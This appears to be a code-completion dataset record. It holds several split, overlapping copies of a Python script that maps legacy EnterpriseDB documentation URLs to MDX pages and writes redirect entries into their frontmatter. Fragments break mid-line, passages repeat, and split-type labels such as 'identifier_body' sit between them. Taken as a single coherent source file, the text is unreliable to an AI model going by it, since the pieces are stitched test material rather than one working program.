legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
if legacy_title in mdx_headings:
if mdx_title in legacy_parents:
heading_matches_exact.append(filename)
heading_matches.append(filename)
if not match_found and len(heading_matches) > 0:
if heading_matches_exact:
heading_matches = heading_matches_exact
if len(heading_matches) > 1:
filtered_matches = [m for m in heading_matches if str(m).startswith(subfolder_docs_path) ]
if filtered_matches: heading_matches = filtered_matches
filename = heading_matches[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(heading_matches) > 1:
print("multiple heading match")
for filename in heading_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
if not match_found and len(title_matches) > 0:
filename = sorted(title_matches, key=lambda t: len(str(t)))[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(title_matches) > 1:
print("multiple titles match")
for filename in title_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
# if no match found, map what's new -> release notes
if not match_found and legacy_page_filename in ['whats_new.html'] and 'release_notes.mdx' in product_mdx_files:
output['release_notes.mdx'].append(url)
matched_count += 1
match_found = True
# if no match found, check for files we remove
legacy_page_filename = url.split('/')[-1].replace('.html', '')
if not match_found and legacy_page_filename in OLD_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
output[str(index_path)].append(url)
matched_count += 1
match_found = True
if match_found:
print("...FOUND!")
if not match_found:
ignore_legacy_titles = ['tableofcontents', 'introduction', 'typographicalconventionsusedinthisguide']
if legacy_title in ignore_legacy_titles: continue
old_failed_to_match[product][version][mdx_folder].append(url)
old_failed_to_match_count += 1
print('...NOT FOUND: {0} ({1}) - {2}'.format(legacy_title, legacy_parents, url))
print("\n{0}================ Report ================{1}".format(ANSI_BLUE, ANSI_STOP))
print("\n{0}-- No Metadata Configured (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(no_metadata)
print("\n{0}-- Version Missing (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(version_missing)
print("\n{0}-- Missing Folder in Metadata --{1}".format(ANSI_RED, ANSI_STOP))
print_report(missing_folder_metadata)
print("\n{0}-- No Folder --{1}".format(ANSI_RED, ANSI_STOP))
print_report(no_files_in_folder)
print("\n{0}-- Summary --{1}".format(ANSI_GREEN, ANSI_STOP))
print('matched {0} of {1} urls processed'.format(matched_count, processed_count))
print('missing folder in metadata: {0}'.format(missing_folder_count))
print('no folder: {0}'.format(no_files))
print('new style urls processed: {}'.format(new_count))
print('new style urls with no match: {}'.format(new_failed_to_match_count))
print('old style urls processed: {}'.format(old_count))
print('old style urls with no match: {}'.format(old_failed_to_match_count))
mdx_files_written = write_redirects_to_mdx_files(output)
mdx_file_count = 0
for path in Path('product_docs/docs').rglob('*.mdx'):
mdx_file_count += 1
print("wrote to {0} of {1} mdx files".format(mdx_files_written, mdx_file_count))
# print_csv_report(new_failed_to_match) | heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line): | random_line_split |
add_legacy_redirects.py | import fileinput
import re
import json
import os
from collections import defaultdict
from pathlib import Path
# This script is still very much a work in progress.
# It does a pretty good job matching "new" style urls using a combination of
# scraped Docs 1.0 site data, and the legacy_redirects_metadata.json file.
# "Old" style urls have had initial work done to map them, but since
# we don't currently have any docs live that used "old" style urls,
# this code is commented out until it's needed (and will need to be developed further)
ANSI_STOP = '\033[0m'
ANSI_BOLD = '\033[1m'
ANSI_BLUE = '\033[34m'
ANSI_GREEN = '\033[32m'
ANSI_YELLOW = '\033[33m'
ANSI_RED = '\033[31m'
NEW_URLS_REMOVED_FILES = ['genindex', 'introduction', 'conclusion', 'whats_new']
OLD_URLS_REMOVED_FILES = ['toc']
def determine_url_scheme(url):
if re.search(r'\.\d+\.html', url) or 'toc.html' in url:
return 'old'
else:
return 'new'
def add_urls_to_output(url, path, output):
output[str(path)].append(url);
def write_redirects_to_mdx_files(output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
| determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
if legacy_title in mdx_headings:
if mdx_title in legacy_parents:
heading_matches_exact.append(filename)
heading_matches.append(filename)
if not match_found and len(heading_matches) > 0:
if heading_matches_exact:
heading_matches = heading_matches_exact
if len(heading_matches) > 1:
filtered_matches = [m for m in heading_matches if str(m).startswith(subfolder_docs_path) ]
if filtered_matches: heading_matches = filtered_matches
filename = heading_matches[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(heading_matches) > 1:
print("multiple heading match")
for filename in heading_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
if not match_found and len(title_matches) > 0:
filename = sorted(title_matches, key=lambda t: len(str(t)))[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(title_matches) > 1:
print("multiple titles match")
for filename in title_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
# if no match found, map what's new -> release notes
if not match_found and legacy_page_filename in ['whats_new.html'] and 'release_notes.mdx' in product_mdx_files:
output['release_notes.mdx'].append(url)
matched_count += 1
match_found = True
# if no match found, check for files we remove
legacy_page_filename = url.split('/')[-1].replace('.html', '')
if not match_found and legacy_page_filename in OLD_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
output[str(index_path)].append(url)
matched_count += 1
match_found = True
if match_found:
print("...FOUND!")
if not match_found:
ignore_legacy_titles = ['tableofcontents', 'introduction', 'typographicalconventionsusedinthisguide']
if legacy_title in ignore_legacy_titles: continue
old_failed_to_match[product][version][mdx_folder].append(url)
old_failed_to_match_count += 1
print('...NOT FOUND: {0} ({1}) - {2}'.format(legacy_title, legacy_parents, url))
print("\n{0}================ Report ================{1}".format(ANSI_BLUE, ANSI_STOP))
print("\n{0}-- No Metadata Configured (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(no_metadata)
print("\n{0}-- Version Missing (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(version_missing)
print("\n{0}-- Missing Folder in Metadata --{1}".format(ANSI_RED, ANSI_STOP))
print_report(missing_folder_metadata)
print("\n{0}-- No Folder --{1}".format(ANSI_RED, ANSI_STOP))
print_report(no_files_in_folder)
print("\n{0}-- Summary --{1}".format(ANSI_GREEN, ANSI_STOP))
print('matched {0} of {1} urls processed'.format(matched_count, processed_count))
print('missing folder in metadata: {0}'.format(missing_folder_count))
print('no folder: {0}'.format(no_files))
print('new style urls processed: {}'.format(new_count))
print('new style urls with no match: {}'.format(new_failed_to_match_count))
print('old style urls processed: {}'.format(old_count))
print('old style urls with no match: {}'.format(old_failed_to_match_count))
mdx_files_written = write_redirects_to_mdx_files(output)
mdx_file_count = 0
for path in Path('product_docs/docs').rglob('*.mdx'):
mdx_file_count += 1
print("wrote to {0} of {1} mdx files".format(mdx_files_written, mdx_file_count))
# print_csv_report(new_failed_to_match)
| title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def | identifier_body |
add_legacy_redirects.py | import fileinput
import re
import json
import os
from collections import defaultdict
from pathlib import Path
# This script is still very much a work in progress.
# It does a pretty good job matching "new" style urls using a combination of
# scraped Docs 1.0 site data, and the legacy_redirects_metadata.json file.
# "Old" style urls have had initial work done to map them, but since
# we don't currently have any docs live that used "old" style urls,
# this code is commented out until it's needed (and will need to be developed further)
ANSI_STOP = '\033[0m'
ANSI_BOLD = '\033[1m'
ANSI_BLUE = '\033[34m'
ANSI_GREEN = '\033[32m'
ANSI_YELLOW = '\033[33m'
ANSI_RED = '\033[31m'
NEW_URLS_REMOVED_FILES = ['genindex', 'introduction', 'conclusion', 'whats_new']
OLD_URLS_REMOVED_FILES = ['toc']
def determine_url_scheme(url):
if re.search(r'\.\d+\.html', url) or 'toc.html' in url:
return 'old'
else:
return 'new'
def add_urls_to_output(url, path, output):
output[str(path)].append(url);
def | (output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
# These functions are only used by the commented out "old" url style handling
def title_from_frontmatter(filepath):
mdx_file = open(filepath)
for line in mdx_file:
if line.startswith('title:'):
mdx_file.close()
return line.split('title:')[1].strip().replace('"', '')
mdx_file.close()
def headings_from_mdx(filepath):
headings = []
heading_re = re.compile(r'^#+ ')
mdx_file = open(filepath)
for line in mdx_file:
if heading_re.match(line):
headings.append(
normalize_title(heading_re.sub('', line))
)
mdx_file.close()
return headings
def normalize_title(title):
title = re.sub(r'^\d*\.?\d*\.?\d*\.?\d*\s', '', title.strip())
title = re.sub(r'[\u2000-\u206F\u2E00-\u2E7F\\\'\-!"#$%&()*+,./:;<=>?@[\]^`{|}~’]', '', title)
title = title.lower().replace(' ', '').replace('*', '').replace('_', '').replace("\\", '').replace('™','').replace('®','')
return title
def determine_root_mdx_file(docs_path, mdx_folder = None):
root_path = docs_path
if mdx_folder:
root_path += '/{}'.format(mdx_folder)
index_path = root_path + '/index.mdx'
if not os.path.exists(index_path):
return None
return index_path
def print_report(report_dict):
for key in report_dict.keys():
value = report_dict[key]
print(ANSI_BOLD + key + ANSI_STOP)
if type(value) is defaultdict:
print_report(value)
else:
print(value)
def print_csv_report(report_dict):
print('Product,Version,Legacy Docs Folder')
for product, versions in report_dict.items():
for version, folders in versions.items():
for folder, urls in folders.items():
for url in urls:
print('{0},{1},{2},{3}'.format(product, version, folder, url))
metadata_file = open(os.path.dirname(__file__) + '/legacy_redirects_metadata.json')
legacy_metadata_by_product = json.load(metadata_file)
metadata_file.close()
json_file = open(os.path.dirname(__file__) + '/legacy_docs_scrape.json')
scraped_legacy_docs_json = json.load(json_file)
json_file.close()
json_file = open(os.path.dirname(__file__) + '/equivalent_versions.json')
equivalent_versions = json.load(json_file)
json_file.close()
legacy_urls_by_product_version = defaultdict(lambda : defaultdict(list))
for data in scraped_legacy_docs_json:
if data.get('product'):
legacy_urls_by_product_version[data.get('product')][data.get('version')].append(data)
processed_count = 0
matched_count = 0
new_count = 0
old_count = 0
missing_folder_count = 0
skipped = 0
no_files = 0
new_failed_to_match = []
new_failed_to_match_count = 0
old_failed_to_match = []
old_failed_to_match_count = 0
no_metadata = defaultdict(lambda : [])
version_missing = defaultdict(lambda : [])
missing_folder_metadata = defaultdict(lambda : defaultdict(set))
no_files_in_folder = defaultdict(lambda : defaultdict(set))
new_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
old_failed_to_match = defaultdict(lambda : defaultdict(lambda : defaultdict(list)))
output = defaultdict(lambda : [])
for product in legacy_urls_by_product_version.keys():
product_data = legacy_urls_by_product_version[product]
for version in product_data.keys():
product_version_data = product_data[version]
effective_version = version
if product in equivalent_versions and version in equivalent_versions.get(product):
effective_version = equivalent_versions.get(product).get(version)
metadata = legacy_metadata_by_product.get(product)
if not metadata:
# no metadata configured for product
no_metadata[product].append(version)
continue
docs_path = 'product_docs/docs/{0}/{1}'.format(metadata['folder_name'], effective_version)
if not os.path.exists(docs_path):
# version does not match a version we have
version_missing[product].append(version)
continue
for legacy_page in product_version_data:
url = legacy_page['url']
if '/latest/' in url:
# skip latest urls if they appear, we'll handle those separately
continue
url_scheme = determine_url_scheme(url)
# if product version index page, can match right here
is_product_index = re.search(r'\/edb-docs\/p\/[\w-]+\/[\d.]+$', url)
if is_product_index:
index_path = determine_root_mdx_file(docs_path)
if index_path:
add_urls_to_output(url, index_path, output)
processed_count += 1
matched_count += 1
continue
legacy_folder = '/'.join(url.split('/')[6:8])
mdx_folder = metadata['subfolders'].get(version)
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
else:
mdx_folder = metadata['subfolders'].get('default')
if mdx_folder:
mdx_folder = mdx_folder.get(legacy_folder)
if mdx_folder == 'skip':
skipped += 1
continue
else:
# At this point we'll say we're attempting to process this record for real
processed_count += 1
if mdx_folder == None: # don't want to catch empty string
# no metadata info for this folder
missing_folder_count += 1
missing_folder_metadata[product][version].add(legacy_folder)
continue
subfolder_docs_path = docs_path
if len(mdx_folder) > 0:
subfolder_docs_path = '{0}/{1}'.format(docs_path, mdx_folder)
if not os.path.exists(subfolder_docs_path):
# no files exist in this folder
no_files += 1
no_files_in_folder[product][version].add(subfolder_docs_path)
continue
subfolder_mdx_files = Path(subfolder_docs_path).rglob('*.mdx')
product_mdx_files = Path(docs_path).rglob('*.mdx')
match_found = False
if url_scheme == 'new':
new_count += 1
legacy_page_filename = url.split('/')[-1].replace('.html', '')
matched_file = []
for filename in subfolder_mdx_files:
mdx_page_filename = str(filename).split('/')[-1]
mdx_page_foldername = str(filename).split('/')[-2]
if (
mdx_page_filename == 'index.mdx' and
mdx_page_foldername != effective_version and
mdx_page_foldername != mdx_folder
):
mdx_page_filename = mdx_page_foldername
mdx_page_filename = re.sub(r'^\d*_', '', mdx_page_filename.replace('.mdx', ''))
if legacy_page_filename == mdx_page_filename:
add_urls_to_output(url, filename, output)
matched_count += 1
match_found = True
break # TODO handle duplicate url bug that affects some "new" style urls
# if no match found, check for files we remove
if legacy_page_filename in NEW_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
add_urls_to_output(url, index_path, output)
matched_count += 1
match_found = True
if not match_found:
new_failed_to_match[product][version][mdx_folder].append(url)
new_failed_to_match_count += 1
# print('no match found for {}'.format(url))
else:
old_count += 1
legacy_title = normalize_title(legacy_page['title'])
legacy_parents = [normalize_title(t) for t in legacy_page['sub_nav']]
print('searching for {0} under {1} in {2}'.format(legacy_title, legacy_parents, subfolder_docs_path))
title_matches = []
heading_matches = []
heading_matches_exact = []
for filename in product_mdx_files:
mdx_title = normalize_title(title_from_frontmatter(filename))
mdx_headings = headings_from_mdx(filename)
if legacy_title == mdx_title:
if str(filename).startswith(subfolder_docs_path):
output[str(filename)].append(url)
matched_count += 1
match_found = True
break
else:
title_matches.append(filename)
if legacy_title in mdx_headings:
if mdx_title in legacy_parents:
heading_matches_exact.append(filename)
heading_matches.append(filename)
if not match_found and len(heading_matches) > 0:
if heading_matches_exact:
heading_matches = heading_matches_exact
if len(heading_matches) > 1:
filtered_matches = [m for m in heading_matches if str(m).startswith(subfolder_docs_path) ]
if filtered_matches: heading_matches = filtered_matches
filename = heading_matches[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(heading_matches) > 1:
print("multiple heading match")
for filename in heading_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
if not match_found and len(title_matches) > 0:
filename = sorted(title_matches, key=lambda t: len(str(t)))[0]
output[str(filename)].append(url)
matched_count += 1
match_found = True
if len(title_matches) > 1:
print("multiple titles match")
for filename in title_matches:
print('{0} ({1}) - {2} - {3}'.format(legacy_title, legacy_parents, filename, url))
# if no match found, map what's new -> release notes
if not match_found and legacy_page_filename in ['whats_new.html'] and 'release_notes.mdx' in product_mdx_files:
output['release_notes.mdx'].append(url)
matched_count += 1
match_found = True
# if no match found, check for files we remove
legacy_page_filename = url.split('/')[-1].replace('.html', '')
if not match_found and legacy_page_filename in OLD_URLS_REMOVED_FILES:
index_path = determine_root_mdx_file(docs_path, mdx_folder)
if index_path:
output[str(index_path)].append(url)
matched_count += 1
match_found = True
if match_found:
print("...FOUND!")
if not match_found:
ignore_legacy_titles = ['tableofcontents', 'introduction', 'typographicalconventionsusedinthisguide']
if legacy_title in ignore_legacy_titles: continue
old_failed_to_match[product][version][mdx_folder].append(url)
old_failed_to_match_count += 1
print('...NOT FOUND: {0} ({1}) - {2}'.format(legacy_title, legacy_parents, url))
print("\n{0}================ Report ================{1}".format(ANSI_BLUE, ANSI_STOP))
print("\n{0}-- No Metadata Configured (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(no_metadata)
print("\n{0}-- Version Missing (Not Processed) --{1}".format(ANSI_YELLOW, ANSI_STOP))
print_report(version_missing)
print("\n{0}-- Missing Folder in Metadata --{1}".format(ANSI_RED, ANSI_STOP))
print_report(missing_folder_metadata)
print("\n{0}-- No Folder --{1}".format(ANSI_RED, ANSI_STOP))
print_report(no_files_in_folder)
print("\n{0}-- Summary --{1}".format(ANSI_GREEN, ANSI_STOP))
print('matched {0} of {1} urls processed'.format(matched_count, processed_count))
print('missing folder in metadata: {0}'.format(missing_folder_count))
print('no folder: {0}'.format(no_files))
print('new style urls processed: {}'.format(new_count))
print('new style urls with no match: {}'.format(new_failed_to_match_count))
print('old style urls processed: {}'.format(old_count))
print('old style urls with no match: {}'.format(old_failed_to_match_count))
mdx_files_written = write_redirects_to_mdx_files(output)
mdx_file_count = 0
for path in Path('product_docs/docs').rglob('*.mdx'):
mdx_file_count += 1
print("wrote to {0} of {1} mdx files".format(mdx_files_written, mdx_file_count))
# print_csv_report(new_failed_to_match)
| write_redirects_to_mdx_files | identifier_name |
add_legacy_redirects.py | import fileinput
import re
import json
import os
from collections import defaultdict
from pathlib import Path
# This script is still very much a work in progress.
# It does a pretty good job matching "new" style urls using a combination of
# scraped Docs 1.0 site data, and the legacy_redirects_metadata.json file.
# "Old" style urls have had initial work done to map them, but since
# we don't currently have any docs live that used "old" style urls,
# this code is commented out until it's needed (and will need to be developed further)
ANSI_STOP = '\033[0m'
ANSI_BOLD = '\033[1m'
ANSI_BLUE = '\033[34m'
ANSI_GREEN = '\033[32m'
ANSI_YELLOW = '\033[33m'
ANSI_RED = '\033[31m'
NEW_URLS_REMOVED_FILES = ['genindex', 'introduction', 'conclusion', 'whats_new']
OLD_URLS_REMOVED_FILES = ['toc']
def determine_url_scheme(url):
if re.search(r'\.\d+\.html', url) or 'toc.html' in url:
return 'old'
else:
return 'new'
def add_urls_to_output(url, path, output):
output[str(path)].append(url);
def write_redirects_to_mdx_files(output):
written = 0
for filepath in Path('product_docs/docs').rglob('*.mdx'):
redirects = output[str(filepath)]
in_frontmatter = False
injected_redirects = False
in_existing_redirect_section = False
for line in fileinput.input(files=[filepath], inplace=1):
if not injected_redirects and line.startswith('---'):
if in_frontmatter and redirects:
written = written + 1
# print redirects at the end of the frontmatter
print('legacyRedirectsGenerated:')
print(' # This list is generated by a script. If you need add entries, use the `legacyRedirects` key.')
for redirect in redirects:
relative_redirect = redirect.split('https://www.enterprisedb.com')[1]
print(' - "{}"'.format(relative_redirect))
injected_redirects = True
in_frontmatter = True
# block existing legacyRedirects from being written back out
if line.startswith('legacyRedirectsGenerated:'):
in_existing_redirect_section = True
elif in_existing_redirect_section and not (line.startswith(' -') or line.lstrip().startswith('#')):
in_existing_redirect_section = False
if not in_existing_redirect_section:
print(line, end="")
return written
